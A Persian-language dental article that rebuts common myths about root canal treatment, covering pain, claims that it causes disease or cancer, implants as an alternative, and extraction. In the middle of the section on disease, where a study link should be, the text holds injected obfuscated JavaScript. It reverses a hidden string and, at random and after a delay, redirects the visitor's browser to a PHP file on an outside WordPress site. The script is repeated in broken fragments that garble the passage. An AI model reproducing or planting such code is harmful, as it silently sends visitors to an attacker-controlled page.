عصب کشی یا به عبارت صحیح‌تر درمان ریشه دندان، یک درمان رایج برای خلاصی از درد دندان و حفظ دندان‌ها می‌باشد. البته مراجعین دندانپزشکی، عقاید متفاوتی در مورد درمان ریشه دارند و بیشتر ذهنیت آن‌ها را، شایعات و صحبت‌های اطرافیان و دوستان شکل می‌دهد. حقیقت این است بسیاری از مواردی که شما در مورد درمان ریشه شنیده‌اید و شما را هنگام مراجعه به دندانپزشک از انجام آن به وحشت می‌اندازد، صحت ندارند و ماهیت درمان ریشه متفاوت از بسیاری از شایعاتی است که در مورد آن‌ها شنیده‌اید. در این مطلب به چند شایعه که در مورد عصب کشی شنیده‌اید پاسخ می‌دهیم.

عصب کشی دردناک است!
معروف‌ترین شایعه در مورد عصب کشی به درد آن مربوط می‌شود. امروزه با وجود بی‌حسی موضعی و تکنولوژی‌های جدیدی که زمان انجام درمان ریشه را کاهش داده‌اند، پروسه درمان عصب کشی دیگر دردناک نیست. تمامی مراحل تحت بی‌حسی موضعی و حتی در برخی کشور‌ها آرامبخشی هوشیارانه انجام می‌شود و شما روی یونیت (صندلی) دندانپزشکی دردی را احساس نمی‌کنید. عصب کشی ترسی ندارد! شعار ما این است که عصب کشی غیر از هزینه دردی ندارد و در مقایسه با چیزی که عاید شما می‌کند (رفع درد و انکان حفظ دندانتان) واقعا درمان مفید، بی‌عارضه و حتی ارزانی است. برای اینکه در مورد حل مشکل ترس خود از عصب کشی و دندانپزشکی گامی بردارید می‌توانید به قسمت «چطور بر ترس از مراجعه به دندانپزشک غلبه کنیم» در اینجا مراجعه کنید و مطالب مفصلی در این مورد بخوانید.

عصب کشی باعث بیماری می‌شود!
اساس شایعه بیماری‌زا بودن درمان‌های ریشه حفظ کننده دندان، حدود صد سال پیش برای اولین بار مطرح شد وبه کشیده شدن دندان‌های زیادی منجر شد. بعد از آن هم غلط بودن این فرضیه به اثبات رسید. نظریه دکتر پرایس (ِDr. Price) با مطالعاتی که بعد‌ها صورت گرفت از بنیه رد شد و حتی جاما در یک مطالعه، اساس روش تحقیق او را مردود دانست! (مطالعه جاما را در رد نظریات دکتر پرایس در $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tol.jamanetwork.com/article.aspx?articleid=1752294″ target=”_blank”>اینجا بخوانید) امروزه اما دوباره شایعه بیماری‌زا بودن عصب‌کشی این بار در مقیاس وسیع در فضای مجازی منتشر می‌شود و نکته جالب اینکه برخی دندانپزشکان به نام دندانپزشمان بیولوژیک یا هولیستیک هم آن را تبلیغ می‌کنند. برای مثال ادعا می‌شود که عصب کشی سرطان‌زاست. چرا که ۹۷ درصد کسانی که به سرطان مبتلا می‌شوند، سابقه عصب کشی دندانشان را داشته‌اند! این ادعا درست مثل این است که ادعا کنیم ۱۰۰ درصد کسانی که به سرطان مبتلا شده‌اند، فوتبال تماشا می‌کردند پس تماشای فوتبال عامل اصلی سرطان است! واضح است که تعدادی زیادی از مردم برای حفظ دندانشان مبادرت به درمان عصب کشی می‌کنند و تعداد زیادی از مردم هم فوتبال تماشا می‌کنند. از میان این افراد متاسفانه عده‌ای هم به سرطان ممکن است مبتلا شوند و تماشای فوتبال یا عصب کشی ربطی به ایجاد سرطان ندارد. کما اینکه حتی حضور یک نفر که تمام دندان‌های خود را در جوانی کشیده است و بعد در کهنسالی به سرطان مبتلا گشته است این فرضیه را رد می‌کند. بسیاری از علل ایجاد سرطان‌ها کشف شده‌اند و دانشمندان در حال تحقیق برای یافتن علت‌های دیگر سرطان هستند. در هیچ کدام از این یافته‌ها تا به حال عصب کشی و یا حتی دندان، عامل ایجاد سرطان ذکر نشده است. تشویق مردم به کشیدن دندان‌ها یک تجارت غیراخلاقی توسط افرادی است که اسم خود را دندانپزشک بیولوژیست گذاشته‌اند و با صدمه به سلامت مردم جیب‌های خود را پر می‌کنند. (مطلب» چرا دندانپزشکی هولیستیک کلاهبرداری است» را دراینجا بخوانید)

جایگزین عصب کشی دندان، ایمپلنت می‌باشد
درمان ایمپلنت درمان به نسبت نوظهوری است که می‌تواند با موفقیت بالا، دندان‌هایی که شما ندارید را جایگزین کند. اما این درمان به‌هیچ‌وجه جایگزین درمان ریشه نیست! جایگزین قلمداد کردن ایمپلنت به جای درمان ریشه درست مثل این است که شما زانویتان در اثر ضربه دچار جراحت شود ولی به جای مداوا، سریع یک زانوی مصنوعی جایگزین آن کنید! بدیهی است که این نوع درمان منطقی نیست. در مورد ایمپلنت همین قدر بهتر است بدانیم که موفقیت آماری درمان ایمپلنت و عصب کشی تا به امروز تقریباً معادل هم بوده است با این تفاوت که درمان ریشه درمانی به مراتب قدیمی تراستو تعداد بسیار بیشتری از آن نسبت به ایمپلنت انجام شده است و همه دندانپزشکان روزمره آن را انجام می‌دهند، بنابراین نتایج مربوط به موفقیت آن در طولانی مدت قابل استناد است. ایمپلنت یک درمان عالی برای جایگزینی دندان‌های ازدست‌رفته است که با عصب کشی و یا سایر درمان‌های پرکردن و روکش و … قادر به نگهداری آن‌ها نیستیم و نه جایگزین عصب کشی.

می‌توانیم عصب کشی نکنیم
مراجعینی داریم که از ما می‌خواهند دندانشان را عصب کشی (درمان ریشه) نکنیم یا با روش دیگری درمان کنیم. حقیقت این است که درمان ریشه دندان درمان آلترناتیو یا جایگزین ندارد. اگر دندانی به اصطلاح به عصب برسد (نیاز به درمان ریشه داشته باشد) تنها درمان جایگزین با علم حاضر غیر از درمان ریشه، کشیدن دندان است. عصب کشی هم درمانی صفر – یک می‌باشد؛ یعنی یک دندان یا عصب کشی می‌شود و یا نمی‌شود و این طور نیست که یک ریشه یا یک کانال درمان شود و دیگری درمان نشود.

کشیدن دندان راحت‌تر از عصب کشی است!
باور غلطی در میان قدیمی‌ها وجود دارد که دندان پوسیده را باید کشید! البته خوشبختانه امروزه دیگر نسل‌های تحصیل‌کرده جدید کمتر چنین عقایدی دارند ولی هرازگاهی با مراجعینی مواجه می‌شویم که به دلیل ترس از عصب کشی یا به دلیل هزینه‌های درمان نگهداری دندان خواهان کشیدن دندان خود هستند. درحالی‌که در مورد ترس، باید خاطرنشان کنیم که کشیدن دندان به‌مراتب درمان خشن‌تر و ناملایم‌تری بوده و با تروما و خونریزی ممکن است همراه باشد. درحالی‌که درمان ریشه آسیبی در این مقیاس به‌هیچ‌وجه ندارد. در مورد هزینه‌ها هم مراجعین ما باید بدانند که در بلندمدت هم هزینه بی‌دندانی و هم هزینه جایگزینی دندان‌های ازدست‌رفته بسیار بیشتر از درمان ریشه و حفظ دندان‌هاست. ازاین‌رو است که دندانپزشکان همیشه بیماران خود را به نگهداری دندان‌های خود ولو با درمان‌های پیچیده، تشویق می‌کنند. ما باید برای سلامتی خود هزینه کنیم، چون سلامتی باارزش‌ترین هدیه‌ای است که از آغاز تولدمان به ما اهدا می‌شود.